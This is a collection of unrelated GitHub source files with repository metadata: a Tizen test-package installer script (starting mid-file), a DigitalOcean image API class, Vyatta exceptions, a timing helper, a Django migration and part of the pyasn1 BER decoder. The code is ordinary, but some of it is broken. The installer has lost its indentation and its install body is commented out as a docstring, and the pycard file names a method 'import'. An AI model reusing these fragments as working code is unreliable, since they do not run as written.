SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
PKG_NAME = os.path.basename(SCRIPT_DIR)
PARAMETERS = None
#XW_ENV = "export DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/5000/dbus/user_bus_socket"
#SRC_DIR = "/home/app/content"
SRC_DIR = "/opt/usr/media"
PKG_SRC_DIR = "%s/tct/opt/%s" % (SRC_DIR, PKG_NAME)
def doCMD(cmd):
# Do not need handle timeout in this short script, let tool do it
print "-->> \"%s\"" % cmd
output = []
cmd_return_code = 1
cmd_proc = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
while True:
output_line = cmd_proc.stdout.readline().strip("\r\n")
cmd_return_code = cmd_proc.poll()
if output_line == '' and cmd_return_code != None:
break
sys.stdout.write("%s\n" % output_line)
sys.stdout.flush()
output.append(output_line)
return (cmd_return_code, output)
def updateCMD(cmd=None):
if "pkgcmd" in cmd:
cmd = "su - %s -c '%s;%s'" % (PARAMETERS.user, XW_ENV, cmd)
return cmd
def getUSERID():
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell id -u %s" % (
PARAMETERS.device, PARAMETERS.user)
else:
cmd = "ssh %s \"id -u %s\"" % (
PARAMETERS.device, PARAMETERS.user )
return doCMD(cmd)
def overwriteCopy(src, dest, symlinks=False, ignore=None):
if not os.path.exists(dest):
os.makedirs(dest)
shutil.copystat(src, dest)
sub_list = os.listdir(src)
if ignore:
excl = ignore(src, sub_list)
sub_list = [x for x in sub_list if x not in excl]
for i_sub in sub_list:
s_path = os.path.join(src, i_sub)
d_path = os.path.join(dest, i_sub)
if symlinks and os.path.islink(s_path):
if os.path.lexists(d_path):
os.remove(d_path)
os.symlink(os.readlink(s_path), d_path)
try:
s_path_s = os.lstat(s_path)
s_path_mode = stat.S_IMODE(s_path_s.st_mode)
os.lchmod(d_path, s_path_mode)
except Exception, e:
pass
elif os.path.isdir(s_path):
overwriteCopy(s_path, d_path, symlinks, ignore)
else:
shutil.copy2(s_path, d_path)
def doCopy(src_item=None, dest_item=None):
try:
if os.path.isdir(src_item):
overwriteCopy(src_item, dest_item, symlinks=True)
else:
if not os.path.exists(os.path.dirname(dest_item)):
LOG.info("Create non-existent dir: %s" %
os.path.dirname(dest_item))
os.makedirs(os.path.dirname(dest_item))
shutil.copy2(src_item, dest_item)
except Exception, e:
return False
return True
def getPKGID(pkg_name=None):
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell %s" % (
PARAMETERS.device, updateCMD('pkgcmd -l'))
else:
cmd = "ssh %s \"%s\"" % (
PARAMETERS.device, updateCMD('pkgcmd -l'))
(return_code, output) = doCMD(cmd)
if return_code != 0:
return None
test_pkg_id = None
for line in output:
pkg_infos = line.split()
if len(pkg_infos) == 4:
continue
name = pkg_infos[5]
name = name.lstrip('[').rstrip(']')
print "name is: %s" % name
if pkg_name == name:
test_pkg_id = pkg_infos[3]
test_pkg_id = test_pkg_id.lstrip('[').rstrip(']')
print test_pkg_id
break
return test_pkg_id
def doRemoteCMD(cmd=None):
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell %s" % (PARAMETERS.device, updateCMD(cmd))
else:
cmd = "ssh %s \"%s\"" % (PARAMETERS.device, updateCMD(cmd))
return doCMD(cmd)
def doRemoteCopy(src=None, dest=None):
if PARAMETERS.mode == "SDB":
cmd_prefix = "sdb -s %s push" % PARAMETERS.device
cmd = "%s %s %s" % (cmd_prefix, src, dest)
else:
cmd = "scp -r %s %s:/%s" % (src, PARAMETERS.device, dest)
(return_code, output) = doCMD(cmd)
doRemoteCMD("sync")
if return_code != 0:
return True
else:
return False
def uninstPKGs():
action_status = True
for root, dirs, files in os.walk(SCRIPT_DIR):
if root.endswith("mediasrc"):
continue
for file in files:
if file.endswith(".wgt"):
pkg_id = getPKGID(os.path.basename(os.path.splitext(file)[0]))
if not pkg_id:
action_status = False
continue
(return_code, output) = doRemoteCMD(
"pkgcmd -u -t wgt -q -n %s" % pkg_id)
for line in output:
if "Failure" in line:
action_status = False
break
(return_code, output) = doRemoteCMD(
"rm -rf %s" % PKG_SRC_DIR)
if return_code != 0:
action_status = False
return action_status
def instPKGs():
""" action_status = True
(return_code, output) = doCMD(
"mkdir -p %s" % PKG_SRC_DIR)
if return_code != 0:
action_status = False
# Do some special copy/delete... steps
'''
(return_code, output) = doRemoteCMD(
"mkdir -p %s/tests" % PKG_SRC_DIR)
if return_code != 0:
action_status = False
if not doRemoteCopy("specname/tests", "%s/tests" % PKG_SRC_DIR):
action_status = False
'''
for item in glob.glob("%s/*" % SCRIPT_DIR):
if item.endswith("inst.py"):
continue
else:
item_name = os.path.basename(item)
if not doCopy(item, "%s/%s" % (PKG_SRC_DIR, item_name)):
action_status = False
print "Package push to host /opt/usr/media/tct/ successfully!"
return action_status
"""
def main():
try:
usage = "usage: inst.py -i"
opts_parser = OptionParser(usage=usage)
opts_parser.add_option(
"-m", dest="mode", action="store", help="Specify mode")
opts_parser.add_option(
"-s", dest="device", action="store", help="Specify device")
opts_parser.add_option(
"-i", dest="binstpkg", action="store_true", help="Install package")
opts_parser.add_option(
"-u", dest="buninstpkg", action="store_true", help="Uninstall package")
opts_parser.add_option(
"-a", dest="user", action="store", help="User name")
global PARAMETERS
(PARAMETERS, args) = opts_parser.parse_args()
except Exception, e:
print "Got wrong option: %s, exit ..." % e
sys.exit(1)
if not PARAMETERS.user:
PARAMETERS.user = "app"
if not PARAMETERS.mode:
PARAMETERS.mode = "SDB"
if PARAMETERS.mode == "SDB":
if not PARAMETERS.device:
(return_code, output) = doCMD("sdb devices")
for line in output:
if str.find(line, "\tdevice") != -1:
PARAMETERS.device = line.split("\t")[0]
break
else:
PARAMETERS.mode = "SSH"
if not PARAMETERS.device:
print "No device provided"
sys.exit(1)
user_info = getUSERID()
re_code = user_info[0]
if re_code == 0 :
global XW_ENV
userid = user_info[1][0]
XW_ENV = "export DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/%s/dbus/user_bus_socket"%str(userid)
else:
print "[Error] cmd commands error : %s"%str(user_info[1])
sys.exit(1)
if PARAMETERS.binstpkg and PARAMETERS.buninstpkg:
print "-i and -u are conflict"
sys.exit(1)
if PARAMETERS.buninstpkg:
if not uninstPKGs():
sys.exit(1)
else:
if not instPKGs():
sys.exit(1)
if __name__ == "__main__":
main()
sys.exit(0)
| {
"content_hash": "da1c03da52c0a977550f785d6b278f9d",
"timestamp": "",
"source": "github",
"line_count": 266,
"max_line_length": 106,
"avg_line_length": 30.13533834586466,
"alnum_prop": 0.5474051896207585,
"repo_name": "yugang/crosswalk-test-suite",
"id": "4579cdf531239379c11addb00031833b071b33fc",
"size": "8039",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "wrt/wrt-manifest-tizen-tests/inst.wgt.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "3495"
},
{
"name": "CSS",
"bytes": "1694855"
},
{
"name": "Erlang",
"bytes": "2850"
},
{
"name": "Java",
"bytes": "155590"
},
{
"name": "JavaScript",
"bytes": "32256550"
},
{
"name": "PHP",
"bytes": "43783"
},
{
"name": "Perl",
"bytes": "1696"
},
{
"name": "Python",
"bytes": "4215706"
},
{
"name": "Shell",
"bytes": "638387"
},
{
"name": "XSLT",
"bytes": "2143471"
}
],
"symlink_target": ""
} |
from .base import Actionable, ResourceWithID, fromISO8601
class Image(Actionable, ResourceWithID):
"""
An image resource, representing an OS image that can be used to create or
reset a droplet.
New images can be created via the :meth:`Droplet.snapshot` method. They
are also automatically created regularly for droplets that have backups
enabled. Images can be retrieved with the :meth:`doapi.fetch_image` and
:meth:`doapi.fetch_all_images` methods, among others.
The DigitalOcean API specifies the following fields for domain objects:
:var id: a unique identifier for the image
:vartype id: int
:var created_at: date & time of the image's creation
:vartype created_at: datetime.datetime
:var distribution: the base Linux distribution used for the image
:vartype distribution: string
:var min_disk_size: the minimum ``disk`` size (in gigabytes) required for a
droplet to use the image
:vartype min_disk_size: number
:var name: a human-readable name for the image
:vartype name: string
:var public: whether the image is public (i.e., available to all accounts)
or not (i.e., only accessible from your account)
:vartype public: bool
:var regions: the slugs of the regions in which the image is available
:vartype regions: list of strings
:var size_gigabytes: the size of the image in gigabytes
:vartype size_gigabytes: number
:var slug: the unique slug identifier for the image (only defined for
public images)
:vartype slug: string or `None`
:var type: the type of the image: ``"snapshot"`` or ``"backup"``
:vartype type: string
"""
def __init__(self, state=None, **extra):
super(Image, self).__init__(state, **extra)
self.created_at = fromISO8601(self.get('created_at'))
def __str__(self):
"""
Convert the image to its slug representation. If the image does not
have a slug, an `AttributeError` is raised.
"""
if self.get("slug") is not None:
return self.slug
else:
raise AttributeError("{0!r} object has no attribute 'slug'"\
.format(self._class()))
@property
def url(self):
""" The endpoint for general operations on the individual image """
return self._url('/v2/images/' + str(self.id))
def fetch(self):
"""
Fetch & return a new `Image` object representing the image's current
state
:rtype: Image
:raises DOAPIError: if the API endpoint replies with an error (e.g., if
the image no longer exists)
"""
api = self.doapi_manager
return api._image(api.request(self.url)["image"])
def update_image(self, name):
# The `_image` is to avoid conflicts with MutableMapping.update.
"""
Update (i.e., rename) the image
:param str name: the new name for the image
:return: an updated `Image` object
:rtype: Image
:raises DOAPIError: if the API endpoint replies with an error
"""
api = self.doapi_manager
return api._image(api.request(self.url, method='PUT',
data={"name": name})["image"])
def delete(self):
"""
Delete the image
:return: `None`
:raises DOAPIError: if the API endpoint replies with an error
"""
self.doapi_manager.request(self.url, method='DELETE')
def transfer(self, region):
"""
Transfer the image to another region
:param region: the slug or `Region` object representing the region to
which to transfer the image
:type region: string or `Region`
:return: an `Action` representing the in-progress operation on the
image
:rtype: Action
:raises DOAPIError: if the API endpoint replies with an error
"""
return self.act(type='transfer', region=region)
def convert(self):
"""
Convert the image to a snapshot
:return: an `Action` representing the in-progress operation on the
image
:rtype: Action
:raises DOAPIError: if the API endpoint replies with an error
"""
return self.act(type='convert')
| {
"content_hash": "e930a021fe541a57601512d6f7a6c60b",
"timestamp": "",
"source": "github",
"line_count": 127,
"max_line_length": 79,
"avg_line_length": 34.31496062992126,
"alnum_prop": 0.6195502524093621,
"repo_name": "jwodder/doapi",
"id": "958aff754bdaac293204d1867f3bf6ef5e332b5e",
"size": "4358",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "doapi/image.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "188382"
}
],
"symlink_target": ""
} |
from neutron.common import exceptions
class CorruptedSystemError(exceptions.NeutronException):
message = _('System contain conflicts: %(description)s.')
class VRouterConnectFailure(exceptions.NeutronException):
"""Couldn't connect to instance."""
message = _("Couldn't connect to Vyatta vRouter [%(ip_address)s].")
class VRouterOperationError(exceptions.NeutronException):
"""Internal Vyatta vRouter exception."""
message = _("Internal Vyatta vRouter exception [%(ip_address)s]:"
"%(reason)s.")
class InvalidVRouterInstance(exceptions.NeutronException):
"""Couldn't find the vrouter instance."""
message = _("Couldn't find Vyatta vRouter instance %(router_id)s.")
class InvalidInstanceConfiguration(exceptions.NeutronException):
"""Invalid vRouter VM instance configuration."""
message = _("Invalid Vyatta vRouter configuration: %(cause)s.")
class InvalidParameter(exceptions.NeutronException):
"""Invalid configuration parameter."""
message = _("Invalid Parameter: %(cause)s.")
class InvalidResponseFormat(exceptions.NeutronException):
message = _('Unparsable vRouter API response: %(details)s')
class WaitTimeoutError(exceptions.NeutronException):
"""Timeout error after waiting for Vyatta vRouter VM creation."""
message = _("Timeout waiting for Vyatta vRouter instance creation.")
class InstanceSpawnError(exceptions.NeutronException):
"""vRouter VM instance spawning error."""
message = _("Failed to spawn Vyatta vRouter VM instance.")
class InvalidL3AgentStateError(exceptions.NeutronException):
message = _('Invalid L3 agent state: %(description)s')
class InvalidVPNServiceError(exceptions.NeutronException):
message = _('Invalid or incomplete VPN service data')
class VPNResourceMappingNotFound(exceptions.NotFound):
message = _('There is no VPN resource mapping for %(kind)s key=%(key)s')
class ResourceNotFound(exceptions.NotFound):
message = _('Resource not found.')
class TableCellNotFound(exceptions.NotFound):
message = _('There is no cell in vRouter status table.')
class DvrOrHaRouterNotSupported(exceptions.NeutronException):
message = _('DVR or HA routers are not supported.')
| {
"content_hash": "84a7bd037ea967ffe1198ee138138b72",
"timestamp": "",
"source": "github",
"line_count": 69,
"max_line_length": 76,
"avg_line_length": 32.30434782608695,
"alnum_prop": 0.7379991027366533,
"repo_name": "rmadapur/networking-brocade",
"id": "f7765cdf75e545d331bb968dde5df6d9ca9f04f5",
"size": "2880",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "networking_brocade/vyatta/common/exceptions.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "321827"
}
],
"symlink_target": ""
} |
from timeit import default_timer
class instrument(object):
def __init__(self):
self.lap_stack = []
self.guard_stack = []
self.lap_table = {}
def start(self):
self.start_time = default_timer()
def stop(self):
self.end_time = default_timer()
def lap(self, func=None, id=None):
""" Can be used as a decorator to time a function or in the
'with' statement as a guard """
if func:
if id is None:
id = "%s.%s" % (func.__module__, func.__name__)
def wrapper(*arg, **kw):
self._start_lap(id)
result = func(*arg, **kw)
self._stop_lap(id)
return result
return wrapper
else:
if id is None: raise "ID must not be None !"
self.guard_stack.append(id)
return self
def __enter__(self):
self._start_lap(self.guard_stack[-1])
return self
def __exit__(self, *args):
self._stop_lap(self.guard_stack[-1])
self.guard_stack.pop()
return False
def _start_lap(self, lap_id):
self.lap_stack.append((default_timer(), lap_id))
def _stop_lap(self, lap_id):
end_time = default_timer()
start_time, start_lap_id = self.lap_stack.pop()
if lap_id != start_lap_id:
raise KeyError("Invalid lap_id: %s" % start_lap_id)
self.lap_table.setdefault(lap_id, []).append(end_time - start_time)
def print_results(self):
def calc_stats(lap_entries):
t_spent = sum(lap_entries, 0.0)
percent = (t_spent/total_time) * 100
count = len(lap_entries)
average = t_spent / count
return (t_spent, percent, count, average)
total_time = (self.end_time - self.start_time)
print "Total time: ", total_time
print "Laps..."
lap_stats = [(k, calc_stats(v)) for k,v in self.lap_table.iteritems()]
lap_stats.sort(lambda a,b: cmp(a[1][0], b[1][0]))
for k, v in lap_stats:
t_spent, percent, count, average = v
print "%30.30s: %7.3f (%5.2f), %5.2d, %7.3f" % (k, t_spent, percent, count, average)
if __name__=="__main__":
import time
inst = instrument()
@inst.lap
def waste_one_sec():
time.sleep(1)
inst.start()
time.sleep(1)
waste_one_sec()
time.sleep(1)
for i in range(3):
waste_one_sec()
time.sleep(1)
for i in range(3):
with inst.lap(id="my_code_block"):
time.sleep(1)
inst.stop()
inst.print_results()
| {
"content_hash": "29edf7e8f81ad25d40f9cae24972119b",
"timestamp": "",
"source": "github",
"line_count": 88,
"max_line_length": 96,
"avg_line_length": 30.136363636363637,
"alnum_prop": 0.5211161387631976,
"repo_name": "inbloom/secure-data-service",
"id": "4fffdb44d806e1577b9430ea8b3d83b6308c721a",
"size": "2652",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "POC/aggregation/mongo/instrumentation.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "AspectJ",
"bytes": "9748"
},
{
"name": "CSS",
"bytes": "112888"
},
{
"name": "Clojure",
"bytes": "37861"
},
{
"name": "CoffeeScript",
"bytes": "18305"
},
{
"name": "Groovy",
"bytes": "26568"
},
{
"name": "Java",
"bytes": "12115410"
},
{
"name": "JavaScript",
"bytes": "390822"
},
{
"name": "Objective-C",
"bytes": "490386"
},
{
"name": "Python",
"bytes": "34255"
},
{
"name": "Ruby",
"bytes": "2543748"
},
{
"name": "Shell",
"bytes": "111267"
},
{
"name": "XSLT",
"bytes": "144746"
}
],
"symlink_target": ""
} |
"""Phylogenetics command line tool wrappers."""
__docformat__ = "restructuredtext en"
from _Phyml import PhymlCommandline
from _Raxml import RaxmlCommandline
#Make this explicit, then they show up in the API docs
__all__ = ["PhymlCommandline",
"RaxmlCommandline",
]
| {
"content_hash": "cf29fe074e180a7c89bebf5b159f6154",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 54,
"avg_line_length": 29,
"alnum_prop": 0.696551724137931,
"repo_name": "bryback/quickseq",
"id": "01dd11c9268e45c7c6b27802d42ea41101487e17",
"size": "515",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "genescript/Bio/Phylo/Applications/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "272327"
},
{
"name": "JavaScript",
"bytes": "61962"
},
{
"name": "Python",
"bytes": "4049558"
}
],
"symlink_target": ""
} |
class CommandError(Exception): pass
class VcsCommandError(Exception): pass
class NoVcsError(Exception): pass
class ShellCommandError(Exception):
def __init__(self, message, output, *args, **kwargs):
super(ShellCommandError, self).__init__(message, *args, **kwargs)
self.output = output
def __str__(self):
s = super(ShellCommandError, self).__str__()
return "%s. Output was:\n%s" % (s, self.output.strip()) | {
"content_hash": "14025868d8b57d7f024f26f182a1ee06",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 73,
"avg_line_length": 35.07692307692308,
"alnum_prop": 0.6425438596491229,
"repo_name": "adamcharnock/seed",
"id": "3ee6cba52e85dde2f496531a3494aa6a1c8e0d7f",
"size": "457",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "seed/exceptions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "302622"
}
],
"symlink_target": ""
} |
import os
import time
from glob import glob
from collections import defaultdict
if __name__ == '__main__':
db = defaultdict(lambda: None)
while True:
remake = False
for file in glob('*.rst'):
mt = os.stat(file).st_mtime
if mt != db[file]:
remake = True
db[file] = mt
if remake:
os.system('make clean')
os.system('make html')
time.sleep(1)
| {
"content_hash": "a01c0568a1e90fc602bc49076a3578c0",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 39,
"avg_line_length": 22.181818181818183,
"alnum_prop": 0.48155737704918034,
"repo_name": "consec/ConSec",
"id": "c652351de75544dfbb43d07acc559208bcadabc5",
"size": "488",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "federation-web/docs/watch.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "5112"
},
{
"name": "CSS",
"bytes": "262571"
},
{
"name": "Cucumber",
"bytes": "15685"
},
{
"name": "HTML",
"bytes": "76686"
},
{
"name": "Java",
"bytes": "1268727"
},
{
"name": "JavaScript",
"bytes": "1158778"
},
{
"name": "Makefile",
"bytes": "6919"
},
{
"name": "PHP",
"bytes": "2878790"
},
{
"name": "Perl",
"bytes": "48337"
},
{
"name": "Python",
"bytes": "298646"
},
{
"name": "Ruby",
"bytes": "7994"
},
{
"name": "Shell",
"bytes": "22042"
}
],
"symlink_target": ""
} |
from functools import partial
from ..params.encodings import EncodingParam
from ..params.values import URLParam
from .base import StringProp
__all__ = ["PhotoProp"]
class PhotoProp(StringProp):
authorized_params = ["ENCODING", "TYPE", "VALUE"]
name = "PHOTO"
def export(self, path):
"""Export value to a file.
"""
pass
def import(self, path):
"""Import a file to the value.
"""
if URLParam in self.params:
## Do not import.
return
## Check and get encodings.
encoders = {p for p in self.params if isinstance(p, EncodingParam)}
if len(encoders) == 0:
raise ValueError("No encoding found.")
elif len(encoders) > 1:
raise ValueError("More than one encoding, ambigous.")
encoder = next(encoders)
## Check path.
if not path.exists():
raise FileNotFoundError( str(path) )
## TODO: Check file extension.
## Do import.
with path.open("rb") as file:
self.value = encoder.encode(file.read())
| {
"content_hash": "fe30045c3494d787e31458c13b1f306e",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 75,
"avg_line_length": 25.837209302325583,
"alnum_prop": 0.5733573357335734,
"repo_name": "Jorispilot/pycard",
"id": "b32f33a531f0049b46183249705db956f034e619",
"size": "1111",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pycard/prop/photo.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "23091"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('event', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='session',
name='tags',
field=models.TextField(blank=True, null=True),
),
]
| {
"content_hash": "d1e7912cbb26cee7fe63667c51108a5c",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 58,
"avg_line_length": 20.555555555555557,
"alnum_prop": 0.581081081081081,
"repo_name": "pytexas/PyTexasBackend",
"id": "b7a7199b302fb2d92b59744a2a71d31e445b3ad5",
"size": "443",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "conference/event/migrations/0002_session_tags.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1680"
},
{
"name": "HTML",
"bytes": "4339"
},
{
"name": "JavaScript",
"bytes": "12017"
},
{
"name": "Python",
"bytes": "16982"
},
{
"name": "Shell",
"bytes": "273"
},
{
"name": "Vue",
"bytes": "10974"
}
],
"symlink_target": ""
} |
from pyasn1 import debug
from pyasn1 import error
from pyasn1.codec.ber import eoo
from pyasn1.compat.integer import from_bytes
from pyasn1.compat.octets import oct2int, octs2ints, ints2octs, null
from pyasn1.type import base
from pyasn1.type import char
from pyasn1.type import tag
from pyasn1.type import tagmap
from pyasn1.type import univ
from pyasn1.type import useful
__all__ = ['decode']
LOG = debug.registerLoggee(__name__, flags=debug.DEBUG_DECODER)
noValue = base.noValue
class AbstractDecoder(object):
protoComponent = None
def valueDecoder(self, substrate, asn1Spec,
tagSet=None, length=None, state=None,
decodeFun=None, substrateFun=None,
**options):
raise error.PyAsn1Error('Decoder not implemented for %s' % (tagSet,))
def indefLenValueDecoder(self, substrate, asn1Spec,
tagSet=None, length=None, state=None,
decodeFun=None, substrateFun=None,
**options):
raise error.PyAsn1Error('Indefinite length mode decoder not implemented for %s' % (tagSet,))
class AbstractSimpleDecoder(AbstractDecoder):
@staticmethod
def substrateCollector(asn1Object, substrate, length):
return substrate[:length], substrate[length:]
def _createComponent(self, asn1Spec, tagSet, value, **options):
if options.get('native'):
return value
elif asn1Spec is None:
return self.protoComponent.clone(value, tagSet=tagSet)
elif value is noValue:
return asn1Spec
else:
return asn1Spec.clone(value)
class ExplicitTagDecoder(AbstractSimpleDecoder):
protoComponent = univ.Any('')
def valueDecoder(self, substrate, asn1Spec,
tagSet=None, length=None, state=None,
decodeFun=None, substrateFun=None,
**options):
if substrateFun:
return substrateFun(
self._createComponent(asn1Spec, tagSet, '', **options),
substrate, length
)
head, tail = substrate[:length], substrate[length:]
value, _ = decodeFun(head, asn1Spec, tagSet, length, **options)
if LOG:
LOG('explicit tag container carries %d octets of trailing payload '
'(will be lost!): %s' % (len(_), debug.hexdump(_)))
return value, tail
def indefLenValueDecoder(self, substrate, asn1Spec,
tagSet=None, length=None, state=None,
decodeFun=None, substrateFun=None,
**options):
if substrateFun:
return substrateFun(
self._createComponent(asn1Spec, tagSet, '', **options),
substrate, length
)
value, substrate = decodeFun(substrate, asn1Spec, tagSet, length, **options)
eooMarker, substrate = decodeFun(substrate, allowEoo=True, **options)
if eooMarker is eoo.endOfOctets:
return value, substrate
else:
raise error.PyAsn1Error('Missing end-of-octets terminator')
explicitTagDecoder = ExplicitTagDecoder()
class IntegerDecoder(AbstractSimpleDecoder):
protoComponent = univ.Integer(0)
def valueDecoder(self, substrate, asn1Spec,
tagSet=None, length=None, state=None,
decodeFun=None, substrateFun=None,
**options):
if tagSet[0].tagFormat != tag.tagFormatSimple:
raise error.PyAsn1Error('Simple tag format expected')
head, tail = substrate[:length], substrate[length:]
if not head:
return self._createComponent(asn1Spec, tagSet, 0, **options), tail
value = from_bytes(head, signed=True)
return self._createComponent(asn1Spec, tagSet, value, **options), tail
class BooleanDecoder(IntegerDecoder):
protoComponent = univ.Boolean(0)
def _createComponent(self, asn1Spec, tagSet, value, **options):
return IntegerDecoder._createComponent(
self, asn1Spec, tagSet, value and 1 or 0, **options)
class BitStringDecoder(AbstractSimpleDecoder):
protoComponent = univ.BitString(())
supportConstructedForm = True
def valueDecoder(self, substrate, asn1Spec,
tagSet=None, length=None, state=None,
decodeFun=None, substrateFun=None,
**options):
head, tail = substrate[:length], substrate[length:]
if substrateFun:
return substrateFun(self._createComponent(
asn1Spec, tagSet, noValue, **options), substrate, length)
if not head:
raise error.PyAsn1Error('Empty BIT STRING substrate')
if tagSet[0].tagFormat == tag.tagFormatSimple: # XXX what tag to check?
trailingBits = oct2int(head[0])
if trailingBits > 7:
raise error.PyAsn1Error(
'Trailing bits overflow %s' % trailingBits
)
value = self.protoComponent.fromOctetString(
head[1:], internalFormat=True, padding=trailingBits)
return self._createComponent(asn1Spec, tagSet, value, **options), tail
if not self.supportConstructedForm:
raise error.PyAsn1Error('Constructed encoding form prohibited '
'at %s' % self.__class__.__name__)
if LOG:
LOG('assembling constructed serialization')
# All inner fragments are of the same type, treat them as octet string
substrateFun = self.substrateCollector
bitString = self.protoComponent.fromOctetString(null, internalFormat=True)
while head:
component, head = decodeFun(head, self.protoComponent,
substrateFun=substrateFun, **options)
trailingBits = oct2int(component[0])
if trailingBits > 7:
raise error.PyAsn1Error(
'Trailing bits overflow %s' % trailingBits
)
bitString = self.protoComponent.fromOctetString(
component[1:], internalFormat=True,
prepend=bitString, padding=trailingBits
)
return self._createComponent(asn1Spec, tagSet, bitString, **options), tail
def indefLenValueDecoder(self, substrate, asn1Spec,
tagSet=None, length=None, state=None,
decodeFun=None, substrateFun=None,
**options):
if substrateFun:
return substrateFun(self._createComponent(asn1Spec, tagSet, noValue, **options), substrate, length)
# All inner fragments are of the same type, treat them as octet string
substrateFun = self.substrateCollector
bitString = self.protoComponent.fromOctetString(null, internalFormat=True)
while substrate:
component, substrate = decodeFun(substrate, self.protoComponent,
substrateFun=substrateFun,
allowEoo=True, **options)
if component is eoo.endOfOctets:
break
trailingBits = oct2int(component[0])
if trailingBits > 7:
raise error.PyAsn1Error(
'Trailing bits overflow %s' % trailingBits
)
bitString = self.protoComponent.fromOctetString(
component[1:], internalFormat=True,
prepend=bitString, padding=trailingBits
)
else:
raise error.SubstrateUnderrunError('No EOO seen before substrate ends')
return self._createComponent(asn1Spec, tagSet, bitString, **options), substrate
class OctetStringDecoder(AbstractSimpleDecoder):
protoComponent = univ.OctetString('')
supportConstructedForm = True
def valueDecoder(self, substrate, asn1Spec,
tagSet=None, length=None, state=None,
decodeFun=None, substrateFun=None,
**options):
head, tail = substrate[:length], substrate[length:]
if substrateFun:
return substrateFun(self._createComponent(asn1Spec, tagSet, noValue, **options),
substrate, length)
if tagSet[0].tagFormat == tag.tagFormatSimple: # XXX what tag to check?
return self._createComponent(asn1Spec, tagSet, head, **options), tail
if not self.supportConstructedForm:
raise error.PyAsn1Error('Constructed encoding form prohibited at %s' % self.__class__.__name__)
if LOG:
LOG('assembling constructed serialization')
# All inner fragments are of the same type, treat them as octet string
substrateFun = self.substrateCollector
header = null
while head:
component, head = decodeFun(head, self.protoComponent,
substrateFun=substrateFun,
**options)
header += component
return self._createComponent(asn1Spec, tagSet, header, **options), tail
def indefLenValueDecoder(self, substrate, asn1Spec,
tagSet=None, length=None, state=None,
decodeFun=None, substrateFun=None,
**options):
if substrateFun and substrateFun is not self.substrateCollector:
asn1Object = self._createComponent(asn1Spec, tagSet, noValue, **options)
return substrateFun(asn1Object, substrate, length)
# All inner fragments are of the same type, treat them as octet string
substrateFun = self.substrateCollector
header = null
while substrate:
component, substrate = decodeFun(substrate,
self.protoComponent,
substrateFun=substrateFun,
allowEoo=True, **options)
if component is eoo.endOfOctets:
break
header += component
else:
raise error.SubstrateUnderrunError(
'No EOO seen before substrate ends'
)
return self._createComponent(asn1Spec, tagSet, header, **options), substrate
class NullDecoder(AbstractSimpleDecoder):
protoComponent = univ.Null('')
def valueDecoder(self, substrate, asn1Spec,
tagSet=None, length=None, state=None,
decodeFun=None, substrateFun=None,
**options):
if tagSet[0].tagFormat != tag.tagFormatSimple:
raise error.PyAsn1Error('Simple tag format expected')
head, tail = substrate[:length], substrate[length:]
component = self._createComponent(asn1Spec, tagSet, '', **options)
if head:
raise error.PyAsn1Error('Unexpected %d-octet substrate for Null' % length)
return component, tail
class ObjectIdentifierDecoder(AbstractSimpleDecoder):
protoComponent = univ.ObjectIdentifier(())
def valueDecoder(self, substrate, asn1Spec,
tagSet=None, length=None, state=None,
decodeFun=None, substrateFun=None,
**options):
if tagSet[0].tagFormat != tag.tagFormatSimple:
raise error.PyAsn1Error('Simple tag format expected')
head, tail = substrate[:length], substrate[length:]
if not head:
raise error.PyAsn1Error('Empty substrate')
head = octs2ints(head)
oid = ()
index = 0
substrateLen = len(head)
while index < substrateLen:
subId = head[index]
index += 1
if subId < 128:
oid += (subId,)
elif subId > 128:
# Construct subid from a number of octets
nextSubId = subId
subId = 0
while nextSubId >= 128:
subId = (subId << 7) + (nextSubId & 0x7F)
if index >= substrateLen:
raise error.SubstrateUnderrunError(
'Short substrate for sub-OID past %s' % (oid,)
)
nextSubId = head[index]
index += 1
oid += ((subId << 7) + nextSubId,)
elif subId == 128:
# ASN.1 spec forbids leading zeros (0x80) in OID
# encoding, tolerating it opens a vulnerability. See
# https://www.esat.kuleuven.be/cosic/publications/article-1432.pdf
# page 7
raise error.PyAsn1Error('Invalid octet 0x80 in OID encoding')
# Decode two leading arcs
if 0 <= oid[0] <= 39:
oid = (0,) + oid
elif 40 <= oid[0] <= 79:
oid = (1, oid[0] - 40) + oid[1:]
elif oid[0] >= 80:
oid = (2, oid[0] - 80) + oid[1:]
else:
raise error.PyAsn1Error('Malformed first OID octet: %s' % head[0])
